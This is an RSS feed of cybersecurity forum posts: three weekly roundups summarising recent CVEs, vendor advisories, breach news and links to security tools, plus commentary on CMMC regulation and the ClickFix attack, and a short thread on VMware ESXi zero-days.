<![CDATA[DoTheNeedful Forums - Cybersecurity]]>

<![CDATA[DoTheNeedful Forums - Cybersecurity]]> https://dotheneedful.online/forums/ Sun, 05 Apr 2026 17:29:54 +0000 MyBB <![CDATA[Gibby's Cybersecurity Roundup 4/4/2025]]> https://dotheneedful.online/forums/showthread.php?tid=42 Fri, 04 Apr 2025 18:26:55 +0000 gibby]]> https://dotheneedful.online/forums/showthread.php?tid=42

Hi everyone and welcome to the third edition of Gibby’s cybersecurity roundup. Each week, I’ll try to compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.

I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

Well, look at that! The usual suspects in the software world apparently took a collective "no new critical flaws this week" vacation. So, instead of our regularly scheduled panic, let's dive into the KEV list – the Hall of Shame for bugs already being used to cause trouble. And wouldn't you know it, this week's inductees are all bringing the high-stakes drama!

High Risk: Google Chrome Zero-day Vulnerability Exploited in the Wild (CVE-2025-2783)
https://threatprotect.qualys.com/2025/03...2025-2783/

High Risk: Cisco Smart Licensing Utility Vulnerabilities
https://sec.cloudapps.cisco.com/security...u-7gHMzWmw

High Risk: Apache Tomcat CVE-2025-24813
https://www.rapid7.com/blog/post/2025/03...d-to-know/

Google's Kyle Chrzanowski says big companies need robot overlords for their digital who's-who, automating everything from birth (account creation) to death (access revocation) of employee identities. Apparently, tackling the messy middle of governance before a massive single sign-on migration is the smart way to avoid a chaotic digital identity crisis.
https://www.googlecloudcommunity.com/gc/...a-p/882952

Sophos detailed this week that evilnginx is still remarkably effective in grabbing credentials and MFA codes
https://news.sophos.com/en-us/2025/03/28...-evilginx/

Checkpoint reassures its customers that the bad guys are "totally lying" about what they were able to get into and steal and to trust them instead:
https://support.checkpoint.com/results/sk/sk183307

China hackers are *still* exploiting buffer overflow flaw in Ivanti's Connect Secure, Policy Secure, and ZTA gateway products. CVE-2025-22457, released in February was originally marked as "low severity" and now that bad guys are kicking in the door reliably, they reconsidered and have classified the flaw as "critical." Idiots.
https://forums.ivanti.com/s/article/Apri...2025-22457

Don't use DMARC? Don't expect Outlook, Live, and Hotmail accounts to get your messages then. After May 5, DMARC is mandatory to get messages to inboxes.
https://techcommunity.microsoft.com/blog...rs/4399730

After *WEEKS* of denying it, Oracle finally acknowledged a breach occurred, surprising absolutely no one
https://www.bloomberg.com/news/articles/...ata-stolen

Stratus Red Team is a tool by Datadog that can “detonate” offensive attack techniques against a live cloud environment so you can validate that your detections work as expected. I’m highlighting here that the docs now provide coverage matrices of MITRE ATT&CK tactics and techniques currently covered for different cloud platforms: AWS, Azure, GCP, Kubernetes, Entra ID, and EKS.
https://stratus-red-team.cloud/attack-te...e-matrices

Wiz has launched a new site for security teams to track critical cloud vulnerabilities, offering handy filters like technology and exploit status. Now you can finally stop manually sifting through endless CVEs and let Wiz be your cloud's most wanted poster.
https://www.wiz.io/vulnerability-database

By Thalium comes a Rust-powered digital bloodhound for Linux, sniffing out sneaky kernel-level rootkits with its fancy integrity checks. It's like giving your kernel a superhero sidekick, but instead of a cape, it wields the Linux Rust API.
https://github.com/thalium/rkchk

This tool sniffs out Google Workspace Domain-Wide Delegation slip-ups in Google Cloud, essentially showing you where you left the keys to the digital kingdom under the doormat. Consider it your auditor for those "oops, did I leave that open?" moments in your GCP setup.
https://github.com/n0tspam/delepwn

ServiceNow, the cloud platform that promised IT zen, turns out to have some hidden ninja stars, according to MDSec's Tim Carrington. Apparently, you can weaponize its own features like custom actions and discovery scripts to run rogue code and generally cause digital mayhem.
https://www.mdsec.co.uk/2025/03/red-team...servicenow

Here is a spot where I’ll just generally soapbox when I want to.

I sure hope you have a wonderful rest of your week.

That's it for this week. Thanks for reading, y'all. See you next week.

]]>

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

Here is a spot where I’ll just generally soapbox when I want to.

I sure hope you have a wonderful rest of your week.

That's it for this week. Thanks for reading, y'all. See you next week.

]]> <![CDATA[Gibby's Cybersecurity Roundup 3/21/25]]> https://dotheneedful.online/forums/showthread.php?tid=33 Thu, 20 Mar 2025 19:51:54 +0000 gibby]]> https://dotheneedful.online/forums/showthread.php?tid=33

Hi everyone and welcome to the second edition of Gibby’s cybersecurity roundup. Each week, I’ll try to compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.

I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

First, lets get started with this weeks new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones.

High Risk: Apache Tomcat vulnerability exploited 30 hours after security bulletin released, confluence admins collectively groan in unison.
Can't make this up-- just 30 hours after the release of the vuln, hackers had a extremely effective and really good exploit for the tomcat service. So, you might want to patch this if you haven't already!

High Risk: A Vulnerability in Veeam allows attackers to execute code remotely; because why not?
Veeam has had some doosies lately, but this one is pretty up there. Domain joined backup servers can pew pew code out making it easy for attackers to disto malware. There is a patch, but the race is on before this is added to the known exploited database, so get on it. https://www.veeam.com/kb4724

High Risk: tj-actions changed-files before 46 allows remote attackers to discover secrets by reading actions logs
tj-actions, a well known and used repo for automating CI/CD silliness had its source changed and hackers were able to get info they shouldn't have. https://www.cve.org/CVERecord?id=CVE-2025-30066

Medium Risk: Another Popular Wordpress Plugin used on 200,000+ sites has a major security flaw; no one is surprised.
WP Ghost, a popular WordPress security plugin, has a critical remote code execution vulnerability, allowing server takeover by unauthenticated attackers. https://patchstack.com/articles/critical...00k-sites/

Medium Risk: Some Cisco Routers have a software flaw that allows attacker to DoS the BGP service.
Looks like this flaw is contained within the BGP service on Cisco XR routers, but it is a pretty bad thing. Check out the security advisory here: https://sec.cloudapps.cisco.com/security...s-O7stePhX

Here's a free web scanner that returns some really awesome information:
https://cyscan.io/

Into Threat Modeling? TRAIL, a threat modeling process by Trail of Bits, blends RRA and NIST approaches to analyze system architecture for design flaws. It models system components, maps threat actor paths, and documents scenarios, providing both immediate mitigations and strategic recommendations.
https://blog.trailofbits.com/2025/02/28/...f-bits-way

State Sponsored Hackers (and some red teams (shhhhh)) are leveraging a flaw that was discovered in 2017 and still not patched by Microsoft.
https://www.zerodayinitiative.com/adviso...5-148/2017

Sperm bank breach deposits data into hands of cybercriminals (I didn't want to edit this hilarious article title because its A+ on its own)
https://www.malwarebytes.com/blog/news/2...rcriminals

By Golly G Wizz... Google Buys Wiz (for a metric shittonne of money)
https://www.reuters.com/technology/cyber...025-03-18/

New kali version out! Now with less salt and more theme action!
https://www.kali.org/blog/kali-linux-2025-1-release/

Detection Studio is a browser tool that converts Sigma rules to SIEM languages (Splunk, Elasticsearch, Grafana) locally using pySigma. It features pipeline/filter support, persistent workspaces, and rule sharing.
https://detection.studio/

Purple Lab simplifies detection rule testing by deploying a lab for log simulation, malware/ATT&CK execution, and sandbox restoration.
https://github.com/Krook9d/PurpleLab

shadow-rs is a rust-based Windows kernel rootkit showcases advanced kernel manipulation with Rust's safety and performance
https://github.com/joaoviictorti/shadow-rs

Adversary Simulation Success by the folks over at TrustedSec outlines measuring AdSim success via control testing, defensive enlightenment, and professional courtesy, providing metrics for each.
https://trustedsec.com/blog/measuring-th...imulations

Here is a spot where I’ll just generally soapbox when I want to.

Keep an eye out on the clickfix campaigns I mentioned last week folks. That activity is really ramping up.

That's it for this week. Thanks for reading, y'all. See you next week.

]]>

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

]]> <![CDATA[Gibby’s Cybersecurity Roundup – 3/14/25]]> https://dotheneedful.online/forums/showthread.php?tid=25 Thu, 13 Mar 2025 16:24:03 +0000 gibby]]> https://dotheneedful.online/forums/showthread.php?tid=25 [Image: nDIfEKX.png]

Hi everyone and welcome to the first edition of Gibby’s cybersecurity roundup. Each week, I’ll compile items I’ve found unique or interesting as I came across them in the cybersecurity world. I’ll try to keep things succinct and to the point, but if there is something I find particularly interesting I may deep dive into a topic a bit more.

I'm using some industry terminology here that might not be clear to everyone. If you have questions let me know but in the meantime here's my attempt to make it digestible for everyone:

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

First, lets get started with this weeks new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones.

High Risk: Publicly facing VMWare ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor.
Find the Q&A about this here: https://github.com/vmware/vcf-security-a...-2025-0004
And more information about the vulnerability here: https://support.broadcom.com/web/ecx/sup...es/0/25390

High Risk: Microsoft Patch Tuesday fixes Seven 0-days and fifty-seven security flaws.
Six of the Seven 0days were being publicly exploited (yay!). I wont list all of them, but the critical security updates are:
CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability
CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability
CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability
CVE-2025-26630 - Microsoft Access Remote Code Execution Vulnerability

High Risk: Fortinet released a number of patches for a slew of their products, some of which are high severity (again).
Double check your devices here: https://www.fortiguard.com/psirt

High Risk: Hackers are using an old vulnerability to pop Cisco Small Business Routers.
CISA added CVE-2023-20118 to its known exploited vulnerabilities catalog this week, meaning the bad guys are bad guying a 2 year old vulnerability.
Check out Cisco’s Security Advisory here https://sec.cloudapps.cisco.com/security...n-ej76Pke5

Researchers have noted a 42% increase in Medusa ransomware attacks from 2023 to 2024, with incidents doubling in early 2025. Medusa, operated as a ransomware-as-a-service (RaaS) by the group tracked as Spearwing, employs double extortion tactics, steals and encrypts data.
https://www.security.com/threat-intellig...re-attacks

Silk Typhoon, a Chinese espionage group, is now using common IT tools for initial access, exploiting unpatched applications to escalate privileges within targeted organizations. After gaining access, they steal credentials to infiltrate networks and abuse various applications, including Microsoft services, for espionage. Microsoft's threat intelligence has detailed these tactics and offers security solutions and mitigation guidance to defend against these attacks.
https://www.microsoft.com/en-us/security...ply-chain/

Google Cloud CISO Phil Venables applies Jim Collins' flywheel concept to amplifying the effects of our security programs, walking through seven potential security flywheels. Those of you in a leadership role inside our outside Cybersecurity should give this a read
https://www.philvenables.com/post/turnin...y-flywheel

A two-year joint effort by Fortra, Microsoft's Digital Crimes Unit, and Health-ISAC has significantly disrupted ransomware operations by targeting the illicit use of Cobalt Strike and compromised Microsoft software. This campaign achieved an 80% reduction in unauthorized Cobalt Strike copies and seized over 200 malicious domains, drastically shortening the time between detecting and dismantling attacks to under a week in the U.S. and under two weeks globally.
https://www.cobaltstrike.com/blog/update...alt-strike

FBI Watchdog is a cyber threat intelligence OSINT tool that monitors domain DNS changes in real-time, specifically detecting law enforcement seizures. It alerts users via Telegram and Discord and captures screenshots of seized domains.
https://github.com/DarkWebInformer/FBI_Watchdog

APT-ATTACK-SIMULATION is a compilation of APT simulations (Russia, China, Iran, North Korea) that target many vital sectors, both private and governmental, including written tools, C2 servers, backdoors, exploitation techniques, stagers, bootloaders, and many other tools that attackers might have used in actual attacks.
https://github.com/S3N4T0R-0X0/APT-Attack-Simulation

A tool created for the red team to test default credentials on SSH and WinRM and then execute scripts if logging in was successful.
https://github.com/RITRedteam/StreetCred

CaptainCrez is a modular and discreet password-spraying tool inspired by CredMaster, featuring enhancements like a cache mechanism, customizable post-actions, and IP rotation via the IPSpinner proxy.
https://github.com/synacktiv/captaincredz

Here is a spot where I’ll just generally soapbox when I want to.

This week I’ve had some discussions around two specific issues. One being regulation, specifically around CMMC, and the other being a new vector that attackers are using that is wildly successful despite it being incredibly obvious that it is bad.

CMMC Sucks and its not going anywhere for 4 more years

Let's first address regulatory compliance, specifically the Cybersecurity Maturity Model Certification (CMMC). For you non-US readers, CMMC is a framework designed to enhance the cybersecurity posture of organizations within the Defense Industrial Base (DIB), a critical sector for national security. It aims to standardize and verify the implementation of cybersecurity best practices across all tiers of the supply chain, from essential support services to advanced research and development.

The anticipated release of the latest CMMC version has been delayed, likely until the next administration. This delay creates a significant challenge: a regulatory vacuum. This vacuum introduces ambiguity, hindering long-term strategic planning and investment in cybersecurity initiatives. Risk owners, from Directors to C-suite executives, are navigating the whiplash of shifting priorities, facing the difficult task of justifying resource allocation amidst regulatory uncertainty. The substantial resource allocation required for CMMC implementation, encompassing not only technology upgrades but also process redesign and workforce training, has been abruptly disrupted. This leaves internal CMMC champions, often IT and security leaders, facing skepticism and uncertainty from other stakeholders who may question the ROI of continued investment.

The resulting impact is a diminished perceived authority of cybersecurity regulations, particularly within the DIB. This uncertainty risks eroding future compliance efforts, potentially leading to continued resistance to essential security measures, such as multi-factor authentication, robust encryption, and continuous monitoring. In a rapidly evolving threat landscape, such resistance can significantly increase an organization's vulnerability.

This situation underscores the critical need for organizations to maintain a proactive and adaptable cybersecurity strategy, regardless of regulatory fluctuations. IT professionals must advocate for a risk-based approach, prioritizing security controls that align with industry best practices and address the most critical threats. This includes fostering a culture of security awareness, implementing robust security architectures, and establishing continuous monitoring and incident response capabilities. It is also essential to maintain open communication with stakeholders, demonstrating the ongoing value of cybersecurity investments and aligning security initiatives with broader business objectives.

TL;DR: CMMC delays create regulatory uncertainty, impacting cybersecurity budgets and adoption. IT pros must advocate for proactive security despite shifting regulations.

Please stop running malicious code willingly

If you're in Incident Response, you've probably seen a rise in this weird attack called 'ClickFix.' If not, buckle up for a wild ride! It's surprisingly simple, and that's why it's working. Here's how it goes:

Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.
Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.

Yeah, it's working. And here's the kicker: it's hitting a specific group of users. Think back to the Windows 95 days. We used to tinker with everything—backgrounds, sounds, even HTML for our MySpace profiles. We broke stuff, fixed it, learned. Everyone did it.

Then came the iPad generation. They got locked-down devices, limited customization. They never played with command lines, never saw what 'Start > Run > cmd' did. They don't know what PowerShell is, let alone why running random code in it is a huge red flag.

So, when they see a pop-up telling them to run a long code in a terminal, they don't get that 'uh-oh' feeling. It looks normal, or at least not dangerous.

That's how people are getting tricked into running malicious code. They just don't know any better. This whole thing highlights a big problem: our security training isn't keeping up with how users have changed. We've got to show them how to spot red flags and get them asking questions. And, you know, maybe bring back a little bit of that healthy skepticism we all used to have.

TL;DR: "ClickFix" attack tricks users into running bad code in PowerShell. They don't know it's dangerous because of how they grew up with computers.

That's it for this week. Thanks for reading, y'all. See you next week.

]]>

TLP: Traffic Light Protocol - a method to classify information from no restrictions (CLEAR) to only shareable between certain people (RED). You can find more information about TLP, and its classification levels, here
Blue Team - The Security Team focused on Defense and Detection
Red team - The Security Team focused on Attacks and Evasion

If you want to see something added here let me know!

First, lets get started with this weeks new vulnerabilities. While this list is not exhaustive-- there were a touch more than 600 new CVEs assigned this week-- it does cover some of the more popular and higher-risk ones.

High Risk: Publicly facing VMWare ESXi servers are getting smoked with a chain of vulnerabilities that allow hackers to execute code on the hypervisor.
Find the Q&A about this here: https://github.com/vmware/vcf-security-a...-2025-0004
And more information about the vulnerability here: https://support.broadcom.com/web/ecx/sup...es/0/25390

High Risk: Microsoft Patch Tuesday fixes Seven 0-days and fifty-seven security flaws.
Six of the Seven 0days were being publicly exploited (yay!). I wont list all of them, but the critical security updates are:
CVE-2025-24983 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2025-24984 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24985 - Windows Fast FAT File System Driver Remote Code Execution Vulnerability
CVE-2025-24991 - Windows NTFS Information Disclosure Vulnerability
CVE-2025-24993 - Windows NTFS Remote Code Execution Vulnerability
CVE-2025-26633 - Microsoft Management Console Security Feature Bypass Vulnerability
CVE-2025-26630 - Microsoft Access Remote Code Execution Vulnerability

High Risk: Fortinet released a number of patches for a slew of their products, some of which are high severity (again).
Double check your devices here: https://www.fortiguard.com/psirt

High Risk: Hackers are using an old vulnerability to pop Cisco Small Business Routers.
CISA added CVE-2023-20118 to its known exploited vulnerabilities catalog this week, meaning the bad guys are bad guying a 2 year old vulnerability.
Check out Cisco’s Security Advisory here https://sec.cloudapps.cisco.com/security...n-ej76Pke5

Fake Alert: Users get a pop-up or fake error message in their browser, looking like a legit system warning.
Copy-Paste-Run: They're told to copy some code, right-click the Start button, and paste it into a PowerShell terminal and hit enter.

]]> <![CDATA[Who's affected by the recent zero-day vulnerabilities in ESXi?]]> https://dotheneedful.online/forums/showthread.php?tid=22 Wed, 12 Mar 2025 03:30:18 +0000 mistiry]]> https://dotheneedful.online/forums/showthread.php?tid=22 https://www.rapid7.com/blog/post/2025/03...-products/

CVE-2025-22224 (CVSS 9.3): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine's VMX process running on the host.
CVE-2025-22225 (CVSS 8.2): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
CVE-2025-22226 (CVSS 7.1): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.

I don't directly deal with our ESXi systems at work, but they were up patching systems tonight for this. A few days late Smile

but...NMFP!]]> https://www.rapid7.com/blog/post/2025/03...-products/

CVE-2025-22224 (CVSS 9.3): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine's VMX process running on the host.
CVE-2025-22225 (CVSS 8.2): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
CVE-2025-22226 (CVSS 7.1): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.

I don't directly deal with our ESXi systems at work, but they were up patching systems tonight for this. A few days late Smile

but...NMFP!]]>